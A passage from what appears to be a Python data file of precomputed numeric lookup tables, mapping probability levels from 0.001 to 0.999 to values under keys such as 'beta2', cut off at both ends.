0.22951000784397224, 0.319: 0.2308320468303265, 0.32: 0.2321567408334091, 0.321: 0.23348407678671212, 0.322: 0.23481404159767033, 0.323: 0.23614662214778254, 0.324: 0.237481805292754, 0.325: 0.23881957786260755, 0.326: 0.24015992666183777, 0.327: 0.24150283846951434, 0.328: 0.24284830003942898, 0.329: 0.24419629810023297, 0.33: 0.245546819355548, 0.331: 0.2468998504841105, 0.332: 0.24825537813989712, 0.333: 0.24961338895226673, 0.334: 0.2509738695260785, 0.335: 0.25233680644183276, 0.336: 0.25370218625580476, 0.337: 0.25506999550016285, 0.338: 0.256440220683123, 0.339: 0.2578128482890625, 0.34: 0.2591878647786696, 0.341: 0.2605652565890646, 0.342: 0.26194501013393234, 0.343: 0.263327111803676, 0.344: 0.2647115479655286, 0.345: 0.26609830496368747, 0.346: 0.2674873691194764, 0.347: 0.2688787267314526, 0.348: 0.27027236407555005, 0.349: 0.27166826740522, 0.35: 0.27306642295155764, 0.351: 0.27446681692344055, 0.352: 0.27586943550767346, 0.353: 0.27727426486911566, 0.354: 0.2786812911508169, 0.355: 0.2800905004741664, 0.356: 0.28150187893901313, 0.357: 0.28291541262381076, 0.358: 0.2843310875857532, 0.359: 0.2857488898609069, 0.36: 0.2871688054643741, 0.361: 0.2885908203903904, 0.362: 0.2900149206125028, 0.363: 0.2914410920836759, 0.364: 0.2928693207364452, 0.365: 0.29429959248306115, 0.366: 0.29573189321561644, 0.367: 0.29716620880619204, 0.368: 0.2986025251069932, 0.369: 0.3000408279504931, 0.37: 0.301481103149569, 0.371: 0.3029233364976476, 0.372: 0.30436751376882576, 0.373: 0.3058136207180387, 0.374: 0.30726164308119197, 0.375: 0.30871156657528576, 0.376: 0.31016337689857654, 0.377: 0.31161705973070963, 0.378: 0.31307260073285487, 0.379: 0.3145299855478523, 0.38: 0.3159891998003598, 0.381: 0.3174502290969953, 0.382: 0.3189130590264567, 0.383: 0.3203776751596956, 0.384: 0.321844063050042, 0.385: 0.32331220823334217, 0.386: 0.3247820962281231, 0.387: 0.32625371253570534, 0.388: 0.3277270426403723, 0.389: 0.32920207200950036, 0.39: 0.3306787860936957, 0.391: 0.33215717032696657, 0.392: 0.333637210126832, 0.393: 0.3351188908944808, 0.394: 0.3366021980149178, 0.395: 0.3380871168571106, 0.396: 0.3395736327741287, 0.397: 0.34106173110327953, 0.398: 0.3425513971662752, 0.399: 0.3440426162693472, 0.4: 0.3455353737034259, 0.401: 0.3470296547442512, 0.402: 0.3485254446525525, 0.403: 0.3500227286741624, 0.404: 0.35152149204017535, 0.405: 0.35302171996710374, 0.406: 0.354523397657002, 0.407: 0.3560265102976395, 0.408: 0.35753104306261807, 0.409: 0.3590369811115355, 0.41: 0.3605443095901345, 0.411: 0.36205301363042935, 0.412: 0.363563078350876, 0.413: 0.3650744888565142, 0.414: 0.36658723023910045, 0.415: 0.36810128757726324, 0.416: 0.3696166459366538, 0.417: 0.37113329037008264, 0.418: 0.3726512059176903, 0.419: 0.37417037760706584, 0.42: 0.3756907904534177, 0.421: 0.3772124294597049, 0.422: 0.3787352796167929, 0.423: 0.38025932590360995, 0.424: 0.38178455328725935, 0.425: 0.38331094672322763, 0.426: 0.38483849115546587, 0.427: 0.3863671715166128, 0.428: 0.3878969727280741, 0.429: 0.38942787970020715, 0.43: 0.3909598773324491, 0.431: 0.39249295051349326, 0.432: 0.3940270841214294, 0.433: 0.3955622630238702, 0.434: 0.3970984720781446, 0.435: 0.39863569613138533, 0.436: 0.4001739200207477, 0.437: 0.4017131285734936, 0.438: 0.4032533066071969, 0.439: 0.40479443892984845, 0.44: 0.4063365103400534, 0.441: 0.40787950562712527, 0.442: 0.40942340957127205, 0.443: 0.4109682069437599, 0.444: 0.4125138825070144, 0.445: 0.4140604210148085, 0.446: 0.41560780721240526, 0.447: 0.4171560258367122, 0.448: 0.41870506161641524, 0.449: 0.42025489927213305, 0.45: 0.4218055235166062, 0.451: 0.4233569190547962, 0.452: 0.4249090705840457, 0.453: 0.42646196279425613, 0.454: 0.42801558036802023, 0.455: 0.4295699079807639, 0.456: 0.43112493030093746, 0.457: 0.43268063199011475, 0.458: 0.4342369977031689, 0.459: 0.4357940120884325, 0.46: 0.43735165978783974, 0.461: 0.43890992543707424, 0.462: 0.44046879366572034, 0.463: 0.4420282490974222, 0.464: 0.4435882763500427, 0.465: 0.4451488600357907, 0.466: 0.4467099847613878, 0.467: 0.44827163512821255, 0.468: 0.4498337957324814, 0.469: 0.4513964511653555, 0.47: 0.4529595860131227, 0.471: 0.45452318485734966, 0.472: 0.4560872322750172, 0.473: 0.45765171283868333, 0.474: 0.45921661111663087, 0.475: 0.4607819116730264, 0.476: 0.4623475990680795, 0.477: 0.4639136578581664, 0.478: 0.46548007259599816, 0.479: 0.4670468278307892, 0.48: 0.4686139081083855, 0.481: 0.47018129797143204, 0.482: 0.4717489819595075, 0.483: 0.47331694460931284, 0.484: 0.4748851704547982, 0.485: 0.47645364402728674, 0.486: 0.47802234985568237, 0.487: 0.4795912724665903, 0.488: 0.4811603963844984, 0.489: 0.48272970613188726, 0.49: 0.48429918622939716, 0.491: 0.48586882119599994, 0.492: 0.4874385955491512, 0.493: 0.4890084938049162, 0.494: 0.4905785004781269, 0.495: 0.49214860008258726, 0.496: 0.4937187771311442, 0.497: 0.4952890161358954, 0.498: 0.4968593016083247, 0.499: 0.4984296180594595, 0.5: 0.49999995000002634, 0.501: 0.501570281940593, 0.502: 0.503140598391728, 0.503: 0.5047108838641572, 0.504: 0.5062811228689086, 0.505: 0.5078512999174655, 0.506: 0.5094213995219258, 0.507: 0.5109914061951365, 0.508: 0.5125613044509014, 0.509: 0.5141310788040525, 0.51: 0.5157007137706554, 0.511: 0.5172701938681654, 0.512: 0.5188395036155542, 0.513: 0.5204086275334624, 0.514: 0.5219775501443703, 0.515: 0.5235462559727657, 0.516: 0.5251147295452544, 0.517: 0.5266829553907397, 0.518: 0.528250918040545, 0.519: 0.5298186020286205, 0.52: 0.5313859918916671, 0.521: 0.5329530721692634, 0.522: 0.5345198274040545, 0.523: 0.5360862421418862, 0.524: 0.537652300931973, 0.525: 0.539217988327026, 0.526: 0.5407832888834216, 0.527: 0.5423481871613691, 0.528: 0.5439126677250353, 0.529: 0.5454767151427029, 0.53: 0.5470403139869298, 0.531: 0.5486034488346969, 0.532: 0.5501661042675711, 0.533: 0.55172826487184, 0.534: 0.5532899152386647, 0.535: 0.5548510399642619, 0.536: 0.5564116236500098, 0.537: 0.5579716509026302, 0.538: 0.559531106334332, 0.539: 0.561089974562978, 0.54: 0.5626482402122126, 0.541: 0.5642058879116199, 0.542: 0.5657629022968834, 0.543: 0.5673192680099375, 0.544: 0.5688749696991147, 0.545: 0.5704299920192883, 0.546: 0.5719843196320321, 0.547: 0.5735379372057962, 0.548: 0.5750908294160064, 0.549: 0.5766429809452559, 0.55: 0.5781943764834458, 0.551: 0.5797450007279189, 0.552: 0.5812948383836369, 0.553: 0.5828438741633399, 0.554: 0.5843920927876468, 0.555: 0.5859394789852435, 0.556: 0.5874860174930375, 0.557: 0.5890316930562921, 0.558: 0.5905764904287797, 0.559: 0.5921203943729266, 0.56: 0.5936633896599984, 0.561: 0.5952054610702033, 0.562: 0.5967465933928549, 0.563: 0.598286771426558, 0.564: 0.5998259799793038, 0.565: 0.6013642038686663, 0.566: 0.6029014279219069, 0.567: 0.6044376369761812, 0.568: 0.605972815878622, 0.569: 0.6075069494865581, 0.57: 0.6090400226676023, 0.571: 0.6105720202998441, 0.572: 0.6121029272719771, 0.573: 0.6136327284834384, 0.574: 0.6151614088445854, 0.575: 0.6166889532768235, 0.576: 0.6182153467127918, 0.577: 0.6197405740964411, 0.578: 0.621264620383258, 0.579: 0.6227874705403462, 0.58: 0.6243091095466332, 0.581: 0.6258295223929876, 0.582: 0.6273486940823675, 0.583: 0.6288666096299769, 0.584: 0.6303832540634109, 0.585: 0.6318986124227917, 0.586: 0.633412669760958, 0.587: 0.6349254111435296, 0.588: 0.6364368216491676, 0.589: 0.6379468863696165, 0.59: 0.6394555904099148, 0.591: 0.6409629188885073, 0.592: 0.6424688569374215, 0.593: 0.6439733897023986, 0.594: 0.6454765023430352, 0.595: 0.6469781800329419, 0.596: 0.6484784079598654, 0.597: 0.6499771713258791, 0.598: 0.6514744553474836, 0.599: 0.6529702452557735, 0.6: 0.6544645262966026, 0.601: 0.6559572837306726, 0.602: 0.657448502833754, 0.603: 0.6589381688967442, 0.604: 0.6604262672259017, 0.605: 0.6619127831429096, 0.606: 0.663397701985108, 0.607: 0.6648810091055518, 0.608: 0.6663626898731922, 0.609: 0.6678427296730491, 0.61: 0.6693211139063204, 0.611: 0.6707978279905191, 0.612: 0.6722728573596439, 0.613: 0.6737461874643103, 0.614: 0.6752178037718943, 0.615: 0.6766876917666598, 0.616: 0.6781558369499654, 0.617: 0.6796222248403179, 0.618: 0.6810868409735612, 0.619: 0.6825496709030271, 0.62: 0.6840107001996586, 0.621: 0.6854699144521739, 0.622: 0.6869272992671747, 0.623: 0.6883828402693223, 0.624: 0.6898365231014565, 0.625: 0.6912883334247485, 0.626: 0.6927382569188532, 0.627: 0.6941862792820104, 0.628: 0.6956323862312337, 0.629: 0.6970765635024082, 0.63: 0.6985187968504759, 0.631: 0.6999590720495417, 0.632: 0.7013973748930374, 0.633: 0.7028336911938431, 0.634: 0.7042680067844215, 0.635: 0.7057003075169808, 0.636: 0.7071305792635945, 0.637: 0.7085588079163645, 0.638: 0.7099849793875307, 0.639: 0.7114090796096405, 0.64: 0.7128310945356621, 0.641: 0.7142510101391204, 0.642: 0.7156688124142838, 0.643: 0.717084487376214, 0.644: 0.7184980210610075, 0.645: 0.7199093995258576, 0.646: 0.7213186088492126, 0.647: 0.7227256351309164, 0.648: 0.7241304644923598, 0.649: 0.7255330830765977, 0.65: 0.7269334770484782, 0.651: 0.7283316325948096, 0.652: 0.7297275359244724, 0.653: 0.7311211732685733, 0.654: 0.7325125308805537, 0.655: 0.733901595036347, 0.656: 0.7352883520345028, 0.657: 0.7366727881963586, 0.658: 0.7380548898661029, 0.659: 0.739434643410972, 0.66: 0.7408120352213614, 0.661: 0.7421870517109705, 0.662: 0.743559679316915, 0.663: 0.7449299044998705, 0.664: 0.7462977137442283, 0.665: 0.7476630935582027, 0.666: 0.7490260304739599, 0.667: 0.7503865110477751, 0.668: 0.7517445218601482, 0.669: 0.7531000495159391, 0.67: 0.7544530806445042, 0.671: 0.7558036018998235, 0.672: 0.7571515999606306, 0.673: 0.7584970615305413, 0.674: 0.7598399733382102, 0.675: 0.761180322137431, 0.676: 0.7625180947072826, 0.677: 0.7638532778522458, 0.678: 0.7651858584023625, 0.679: 0.7665158232133165, 0.68: 0.7678431591666188, 0.681: 0.769167853169701, 0.682: 0.7704898921560582, 0.683: 0.7718092630853548, 0.684: 0.7731259529436056, 0.685: 0.7744399487432396, 0.686: 0.7757512375232757, 0.687: 0.77705980634943, 0.688: 0.7783656423142555, 0.689: 0.7796687325372516, 0.69: 0.7809690641650093, 0.691: 0.7822666243713208, 0.692: 0.7835614003573212, 0.693: 0.7848533793516024, 0.694: 0.7861425486103601, 0.695: 0.7874288954174895, 0.696: 0.7887124070847301, 0.697: 0.7899930709517766, 0.698: 0.7912708743864384, 0.699: 0.7925458047847241, 0.7: 0.7938178495709807, 0.701: 0.7950869961980253, 0.702: 0.7963532321472501, 0.703: 0.7976165449287628, 0.704: 0.7988769220815145, 0.705: 0.8001343511734024, 0.706: 0.8013888198013999, 0.707: 0.8026403155916954, 0.708: 0.8038888261997863, 0.709: 0.8051343393106174, 0.71: 0.8063768426387102, 0.711: 0.8076163239282677, 0.712: 0.8088527709533002, 0.713: 0.8100861715177531, 0.714: 0.8113165134556105, 0.715: 0.8125437846310448, 0.716: 0.8137679729384877, 0.717: 0.8149890663028079, 0.718: 0.8162070526793901, 0.719: 0.817421920054271, 0.72: 0.8186336564442488, 0.721: 0.8198422498970002, 0.722: 0.8210476884912175, 0.723: 0.8222499603366951, 0.724: 0.8234490535744822, 0.725: 0.82464495637696, 0.726: 0.8258376569479937, 0.727: 0.8270271435230239, 0.728: 0.8282134043692099, 0.729: 0.8293964277855104, 0.73: 0.8305762021028226, 0.731: 0.8317527156841129, 0.732: 0.8329259569244847, 0.733: 0.8340959142513266, 0.734: 0.8352625761244205, 0.735: 0.8364259310360529, 0.736: 0.8375859675111375, 0.737: 0.8387426741073075, 0.738: 0.8398960394150405, 0.739: 0.8410460520577919, 0.74: 0.8421927006920776, 0.741: 0.8433359740075778, 0.742: 0.8444758607272893, 0.743: 0.8456123496075938, 0.744: 0.8467454294384124, 0.745: 0.8478750890432711, 0.746: 0.8490013172794411, 0.747: 0.8501241030380398, 0.748: 0.8512434352441408, 0.749: 0.8523593028568818, 0.75: 0.8534716948695734, 0.751: 0.8545806003098092, 0.752: 0.8556860082395743, 0.753: 0.8567879077553627, 0.754: 0.8578862879882565, 0.755: 0.8589811381040585, 0.756: 0.8600724473033952, 0.757: 0.8611602048218131, 0.758: 0.8622443999298985, 0.759: 0.8633250219333687, 0.76: 0.8644020601732016, 0.761: 0.8654755040257103, 0.762: 0.8665453429026564, 0.763: 0.8676115662513868, 0.764: 0.8686741635548794, 0.765: 0.8697331243319023, 0.766: 0.8707884381370734, 0.767: 0.8718400945610152, 0.768: 0.8728880832303882, 0.769: 0.8739323938080559, 0.77: 0.8749730159931451, 0.771: 0.8760099395211802, 0.772: 0.8770431541641623, 0.773: 0.8780726497306806, 0.774: 0.8790984160659892, 0.775: 0.8801204430521462, 0.776: 0.8811387206080885, 0.777: 0.8821532386897348, 0.778: 0.8831639872900949, 0.779: 0.8841709564393376, 0.78: 0.8851741362049375, 0.781: 0.8861735166917408, 0.782: 0.8871690880420503, 0.783: 0.8881608404357615, 0.784: 0.8891487640904325, 0.785: 0.8901328492613948, 0.786: 0.8911130862418335, 0.787: 0.8920894653628848, 0.788: 0.8930619769937581, 0.789: 0.8940306115417905, 0.79: 0.8949953594525705, 0.791: 0.8959562112100302, 0.792: 0.8969131573365103, 0.793: 0.8978661883929069, 0.794: 0.8988152949787099, 0.795: 0.8997604677321327, 0.796: 0.9007016973301941, 0.797: 0.9016389744887798, 0.798: 0.902572289962797, 0.799: 0.9035016345462047, 0.8: 0.904426999072146, 0.801: 0.9053483744130083, 0.802: 0.9062657514805408, 0.803: 0.9071791212259233, 0.804: 0.9080884746398658, 0.805: 0.9089938027526939, 0.806: 0.9098950966344315, 0.807: 0.910792347394901, 0.808: 0.9116855461838177, 0.809: 0.9125746841908512, 0.81: 0.9134597526457117, 0.811: 0.9143407428182829, 0.812: 0.9152176460186581, 0.813: 0.9160904535972341, 0.814: 0.9169591569448252, 0.815: 0.9178237474927222, 0.816: 0.9186842167127738, 0.817: 0.9195405561174878, 0.818: 0.9203927572601225, 0.819: 0.9212408117347362, 0.82: 0.9220847111762885, 0.821: 0.9229244472607281, 0.822: 0.9237600117050847, 0.823: 0.9245913962675107, 0.824: 0.9254185927473991, 0.825: 0.9262415929854614, 0.826: 0.9270603888637834, 0.827: 0.9278749723059329, 0.828: 0.9286853352770361, 0.829: 0.9294914697838355, 0.83: 0.9302933678747891, 0.831: 0.9310910216401402, 0.832: 0.9318844232119854, 0.833: 0.9326735647643802, 0.834: 0.9334584385133998, 0.835: 0.9342390367172065, 0.836: 0.9350153516761455, 0.837: 0.9357873757328031, 0.838: 0.9365551012720951, 0.839: 0.9373185207213172, 0.84: 0.9380776265502867, 0.841: 0.9388324112713275, 0.842: 0.9395828674393858, 0.843: 0.9403289876521342, 0.844: 0.9410707645499891, 0.845: 0.9418081908162181, 0.846: 0.9425412591769937, 0.847: 0.9432699624014971, 0.848: 0.9439942933019441, 0.849: 0.9447142447336556, 0.85: 0.9454298095952256, 0.851: 0.9461409808284335, 0.852: 0.9468477514184452, 0.853: 0.9475501143938321, 0.854: 0.9482480628266101, 0.855: 0.9489415898323792, 0.856: 0.9496306885703165, 0.857: 0.9503153522432926, 0.858: 0.9509955740979518, 0.859: 0.9516713474246952, 0.86: 0.9523426655578546, 0.861: 0.9530095218756819, 0.862: 0.9536719098004376, 0.863: 0.9543298227984653, 0.864: 0.9549832543802415, 0.865: 0.9556321981004747, 0.866: 0.9562766475580771, 0.867: 0.9569165963963785, 0.868: 0.957552038303007, 0.869: 0.9581829670101363, 0.87: 0.9588093762944023, 0.871: 0.9594312599770245, 0.872: 0.9600486119238871, 0.873: 0.9606614260455268, 0.874: 0.9612696962973124, 0.875: 0.9618734166793589, 0.876: 0.9624725812367078, 0.877: 0.9630671840593212, 0.878: 0.963657219282159, 0.879: 0.9642426810852343, 0.88: 0.9648235636936664, 0.881: 0.9653998613777618, 0.882: 0.9659715684530346, 0.883: 0.9665386792802856, 0.884: 0.9671011882656463, 0.885: 0.9676590898606391, 0.886: 0.9682123785622323, 0.887: 0.9687610489129148, 0.888: 0.9693050955007348, 0.889: 0.9698445129592854, 0.89: 0.9703792959678934, 0.891: 0.9709094392515344, 0.892: 0.9714349375810314, 0.893: 0.9719557857729668, 0.894: 0.9724719786897739, 0.895: 0.9729835112398603, 0.896: 0.9734903783775493, 0.897: 0.9739925751032259, 0.898: 0.9744900964633376, 0.899: 0.9749829375503833, 0.9: 0.9754710935031543, 0.901: 0.975954559506505, 0.902: 0.9764333307916824, 0.903: 0.9769074026361838, 0.904: 0.977376770363807, 0.905: 0.9778414293448636, 0.906: 0.9783013749960354, 0.907: 0.9787566027805276, 0.908: 0.9792071082080259, 0.909: 0.979652886834865, 0.91: 0.9800939342639616, 0.911: 0.9805302461449361, 0.912: 0.9809618181741064, 0.913: 0.9813886460944932, 0.914: 0.9818107256959976, 0.915: 0.9822280528152776, 0.916: 0.9826406233359377, 0.917: 0.9830484331884335, 0.918: 0.9834514783502447, 0.919: 0.983849754845784, 0.92: 0.9842432587465588, 0.921: 0.9846319861711421, 0.922: 0.9850159332851474, 0.923: 0.9853950963014838, 0.924: 0.9857694714800598, 0.925: 0.9861390551281946, 0.926: 0.9865038436003799, 0.927: 0.9868638332984115, 0.928: 0.9872190206714289, 0.929: 0.9875694022159492, 0.93: 0.9879149744757998, 0.931: 0.9882557340424174, 0.932: 0.9885916775546096, 0.933: 0.9889228016987052, 0.934: 0.9892491032085032, 0.935: 0.9895705788654393, 0.936: 0.9898872254986016, 0.937: 0.9901990399846192, 0.938: 0.9905060192478585, 0.939: 0.9908081602602608, 0.94: 0.9911054600416364, 0.941: 0.9913979156594912, 0.942: 0.9916855242290242, 0.943: 0.9919682829133988, 0.944: 0.9922461889235121, 0.945: 0.9925192395181012, 0.946: 0.9927874320039602, 0.947: 0.9930507637356284, 0.948: 0.9933092321156767, 0.949: 0.9935628345946121, 0.95: 0.9938115686709654, 0.951: 0.9940554318912629, 0.952: 0.9942944218501137, 0.953: 0.9945285361901042, 0.954: 0.9947577726020647, 0.955: 0.994982128824796, 0.956: 0.9952016026454088, 0.957: 0.9954161918988457, 0.958: 0.9956258944685976, 0.959: 0.9958307082861366, 0.96: 0.9960306313311733, 0.961: 0.9962256616318514, 0.962: 0.9964157972645225, 0.963: 0.9966010363532803, 0.964: 0.9967813770714362, 0.965: 0.9969568176399499, 0.966: 0.9971273563282133, 0.967: 0.9972929914544159, 0.968: 0.9974537213842967, 0.969: 0.997609544532683, 0.97: 0.99776045936265, 0.971: 0.9979064643855302, 0.972: 0.998047558161119, 0.973: 0.9981837392977511, 0.974: 0.9983150064523987, 0.975: 0.998441358329476, 0.976: 0.9985627936837991, 0.977: 0.9986793113165953, 0.978: 0.9987909100790213, 0.979: 0.9988975888701616, 0.98: 0.9989993466374386, 0.981: 0.9990961823781122, 0.982: 0.9991880951364369, 0.983: 0.9992750840051866, 0.984: 0.9993571481267158, 0.985: 0.9994342866927166, 0.986: 0.9995064989413405, 0.987: 0.9995737841591226, 0.988: 0.9996361416834054, 0.989: 0.999693570900148, 0.99: 0.9997460712416946, 0.991: 0.9997936421899241, 0.992: 0.9998362832780031, 0.993: 0.9998739940837995, 0.994: 0.9999067742301825, 0.995: 0.9999346234013291, 0.996: 0.9999575413149437, 0.997: 0.9999755277529793, 0.998: 0.9999885825363027, 0.999: 0.9999967055724355}, 'beta2': {0.001: 0.18138618309331878, 0.002: 0.2095288006990791, 0.003: 0.22808938583740646, 0.004: 0.24231103099879125, 0.005: 0.25399266824367905, 0.006: 0.2639853316123639, 0.007: 0.27276438337239206, 0.008: 0.2806244307628958, 0.009: 0.2877616440177957, 0.01: 0.2943137216819569, 0.011: 0.3003813120390968, 0.012: 0.3060403810987299, 0.013: 0.3113497805549208, 0.014: 0.3163561002121821, 0.015: 0.3210969013101458, 0.016: 0.325602941614643, 0.017: 0.329899749275389, 0.018: 0.33400876269337276, 0.019: 0.33794817324913373, 0.02: 0.3417335597331963, 0.021: 0.3453783736859486, 0.022: 0.3488943160363729, 0.023: 0.3522916331669663, 0.024: 0.3555793523572848, 0.025: 0.3587654710031575, 0.026: 0.3618571101532857, 0.027: 0.36486064019226205, 0.028: 0.36778178455819777, 0.029: 0.37062570597348865, 0.03: 0.37339707863290983, 0.031: 0.37610014902380184, 0.032: 0.3787387874740419, 0.033: 0.3813165320847782, 0.034: 0.3838366263675599, 0.035: 0.38630205164508613, 0.036: 0.3887155550719671, 0.037: 0.3910796739716751, 0.038: 0.3933967570598198, 0.039: 0.39566898302294606, 0.04: 0.3978983768411247, 0.041: 0.400086824177587, 0.042: 0.40223608410583866, 0.043: 0.4043478004003044, 0.044: 0.4064235115828295, 0.045: 0.40846465988692804, 0.046: 0.41047259927722757, 0.047: 0.4124486026424321, 0.048: 0.41439386826257285, 0.049: 0.4163095256370182, 0.05: 0.41819664074840723, 0.051: 0.42005622082694316, 0.052: 0.4218892186715135, 0.053: 0.4236965365765072, 0.054: 0.4254790299068756, 0.055: 0.42723751035902224, 0.056: 0.42897274894021686, 0.057: 0.4306854786954264, 0.058: 0.4323763972069631, 0.059: 0.4340461688895506, 0.06: 0.43569542710067843, 0.061: 0.4373247760837633, 0.062: 0.43893479276010283, 0.063: 0.4405260283836726, 0.064: 0.44209901007086383, 0.065: 0.443654242216893, 0.066: 0.44671336964273567, 0.067: 0.44671336964273567, 0.068: 0.4497070389866893, 0.069: 0.4497070389866893, 0.07: 0.45263858990657657, 0.071: 0.45263858990657657, 0.072: 0.4540820432314365, 0.073: 0.45551110378697934, 0.074: 0.4569261207298041, 0.075: 0.4583274301949174, 0.076: 0.45971535594807744, 0.077: 0.46109020999750316, 0.078: 0.4624522931676177, 0.079: 0.4638018956379941, 0.08: 0.46513929744980287, 0.081: 0.4664647689820931, 0.082: 0.4677785714002497, 0.083: 0.46908095707825426, 0.084: 0.47037216999690146, 0.085: 0.4716524461194248, 0.086: 0.47292201374610887, 0.087: 0.4741810938492603, 0.088: 0.47542990038988897, 0.089: 0.4766686406172559, 0.09: 0.4778975153524657, 0.091: 0.47911671925695065, 0.092: 0.48032644108707956, 0.093: 0.4815268639354624, 0.094: 0.4827181654599544, 0.095: 0.4839005181010876, 0.096: 0.48507408928867246, 0.097: 0.4862390416379627, 0.098: 0.4873955331364289, 0.099: 0.48854371732133284, 0.1: 0.4896837434487873, 0.101: 0.49081575665475574, 0.102: 0.49193989810855143, 0.103: 0.4930563051590159, 0.104: 0.49416511147415587, 0.105: 0.495266447174198, 0.106: 0.49636043895869586, 0.107: 0.49744721022798233, 0.108: 0.49852688119905497, 0.109: 0.4995995690166022, 0.11: 0.5006653878589256, 0.111: 0.5017244490394137, 0.112: 0.5027768611037023, 0.113: 0.5038227299225796, 0.114: 0.5048621587811261, 0.115: 0.5058952484639588, 0.116: 0.5069220973371278, 0.117: 0.5079428014264691, 0.118: 0.5089574544929876, 0.119: 0.5099661481050076, 0.12: 0.5109689717074745, 0.121: 0.5119660126886201, 0.122: 0.5129573564438621, 0.123: 0.5139430864373226, 0.124: 0.5149232842608563, 0.125: 0.5158980296909226, 0.126: 0.5168674007432517, 0.127: 0.5178314737253517, 0.128: 0.5187903232872535, 0.129: 0.5197440224701283, 0.13: 0.520692642753303, 0.131: 0.5216362540994293, 0.132: 0.5225749249981224, 0.133: 0.5235087225078974, 0.134: 0.5244377122967149, 0.135: 0.52536195868101, 0.136: 0.5262815246634096, 0.137: 0.5271964719690554, 0.138: 0.5281068610807536, 0.139: 0.5290127512728111, 0.14: 0.5299142006438173, 0.141: 0.5308112661481983, 0.142: 0.5317040036268519, 0.143: 0.5325924678365663, 0.144: 0.5334767124786391, 0.145: 0.5343567902264184, 0.146: 0.5352327527520485, 0.147: 0.5361046507522651, 0.148: 0.5369725339733495, 0.149: 0.5378364512353526, 0.15: 0.5386964504554625, 0.151: 0.5395525786707096, 0.152: 0.540404882059873, 0.153: 0.5412534059647808, 0.154: 0.542098194910871, 0.155: 0.5429392926271754, 0.156: 0.5437767420656946, 0.157: 0.5446105854201171, 0.158: 0.5454408641439848, 0.159: 0.5462676189684185, 0.16: 0.5470908899191484, 0.161: 0.5479107163331672, 0.162: 0.5487271368748141, 0.163: 0.5495401895514537, 0.164: 0.5503499117285972, 0.165: 0.551156340144686, 0.166: 0.5519595109254223, 0.167: 0.5527594595976102, 0.168: 0.5535562211027355, 0.169: 0.5543498298100424, 0.17: 0.5551403195293081, 0.171: 0.5559277235232404, 0.172: 0.5567120745195285, 0.173: 0.5574934047225648, 0.174: 0.5582717458248277, 0.175: 0.559047129017996, 0.176: 0.5598195850037039, 0.177: 0.5605891440040408, 0.178: 0.5613558357717686, 0.179: 0.5621196896002469, 0.18: 0.5628807343331038, 0.181: 0.5636389983736705, 0.182: 0.5643945096941182, 0.183: 0.5651472958444157, 0.184: 0.565897383961005, 0.185: 0.5666448007752878, 0.186: 0.5673895726218545, 0.187: 0.5681317254465624, 0.188: 0.5688712848143356, 0.189: 0.5696082759168204, 0.19: 0.570342723579832, 0.191: 0.5718040861049116, 0.192: 0.5718040861049116, 0.193: 0.5732555639507467, 0.194: 0.5732555639507467, 0.195: 0.5746973432714193, 0.196: 0.5746973432714193, 0.197: 0.5761296050215254, 0.198: 0.5761296050215254, 0.199: 0.5775525251538719, 0.2: 0.5775525251538719, 0.201: 0.5789662748077831, 0.202: 0.5789662748077831, 0.203: 0.580371020488508, 0.204: 0.580371020488508, 0.205: 0.5810700676469496, 0.206: 0.5817669242382939, 0.207: 0.5824616098472468, 0.208: 0.5831541437995564, 0.209: 0.5838445451667302, 0.21: 0.5845328327706043, 0.211: 0.5852190251878382, 0.212: 0.585903140754301, 0.213: 0.5865851975693661, 0.214: 0.5872652135000757, 0.215: 0.5879432061852801, 0.216: 0.5886191930396023, 0.217: 0.5892931912573885, 0.218: 0.5899652178165296, 0.219: 0.5906352894822113, 0.22: 0.5913034228105724, 0.221: 0.5919696341523156, 0.222: 0.5926339396561907, 0.223: 0.5932963552724543, 0.224: 0.5939568967562234, 0.225: 0.5946155796707533, 0.226: 0.5952724193906889, 0.227: 0.5959274311051924, 0.228: 0.596580629821043, 0.229: 0.5972320303656522, 0.23: 0.5978816473900281, 0.231: 0.5985294953716854, 0.232: 0.5991755886174532, 0.233: 0.5998199412662939, 0.234: 0.6004625672920095, 0.235: 0.601103480505905, 0.236: 0.6017426945594111, 0.237: 0.6023802229466413, 0.238: 0.6030160790069156, 0.239: 0.6036502759272008, 0.24: 0.6042828267445396, 0.241: 0.6049137443484032, 0.242: 0.6055430414830111, 0.243: 0.6061707307496114, 0.244: 0.6067968246086884, 0.245: 0.6074213353821661, 0.246: 0.6080442752555413, 0.247: 0.6086656562799749, 0.248: 0.6092854903743761, 0.249: 0.609903789327387, 0.25: 0.6105205647993905, 0.251: 0.6111358283244531, 0.252: 0.6117495913122184, 0.253: 0.6123618650497772, 0.254: 0.6129726607035273, 0.255: 0.6135819893209489, 0.256: 0.6141898618323709, 0.257: 0.6147962890527381, 0.258: 0.6154012816832698, 0.259: 0.6160048503131699, 0.26: 0.6166070054212498, 0.261: 0.6172077573775245, 0.262: 0.6178071164448349, 0.263: 0.6184050927803595, 0.264: 0.6190016964371575, 0.265: 0.6195969373656643, 0.266: 0.6201908254151702, 0.267: 0.6207833703352457, 0.268: 0.6213745817771764, 0.269: 0.6219644692953454, 0.27: 0.6225530423486144, 0.271: 0.6231403103016593, 0.272: 0.6237262824262815, 0.273: 0.624310967902731, 0.274: 0.624894375820968, 0.275: 0.6254765151819087, 0.276: 0.6260573948986715, 0.277: 0.6266370237977733, 0.278: 0.627215410620342, 0.279: 0.6277925640232481, 0.28: 0.6283684925803023, 0.281: 0.628943204783341, 0.282: 0.629516709043367, 0.283: 0.6300890136916307, 0.284: 0.6306601269807006, 0.285: 0.6312300570855304, 0.286: 0.6317988121044862, 0.287: 0.6323664000603757, 0.288: 0.6329328289014384, 0.289: 0.633498106502367, 0.29: 0.6340622406652381, 0.291: 0.6346252391204967, 0.292: 0.6351871095278874, 0.293: 0.6357478594773636, 0.294: 0.6363074964900378, 0.295: 0.6368660280190218, 0.296: 0.6374234614503631, 0.297: 0.6379798041038829, 0.298: 0.6385350632340105, 0.299: 0.6390892460306717, 0.3: 0.6396423596200767, 0.301: 0.6401944110655492, 0.302: 0.6407454073683171, 0.303: 0.6412953554683015, 0.304: 0.6418442622449138, 0.305: 0.6423921345177895, 0.306: 0.6429389790475577, 0.307: 0.6434848025365723, 0.308: 0.644029611629644, 0.309: 0.6445734129147622, 0.31: 0.6451162129237973, 0.311: 0.6456580181331952, 0.312: 0.6461988349646632, 0.313: 0.6467386697858525, 0.314: 0.6472775289110052, 0.315: 0.6478154186016275, 0.316: 0.6488883144654416, 0.317: 0.6488883144654416, 0.318: 0.6499574064387202, 0.319: 0.6499574064387202, 0.32: 0.6510227427792847, 0.321: 0.6510227427792847, 0.322: 0.6520843709606412, 0.323: 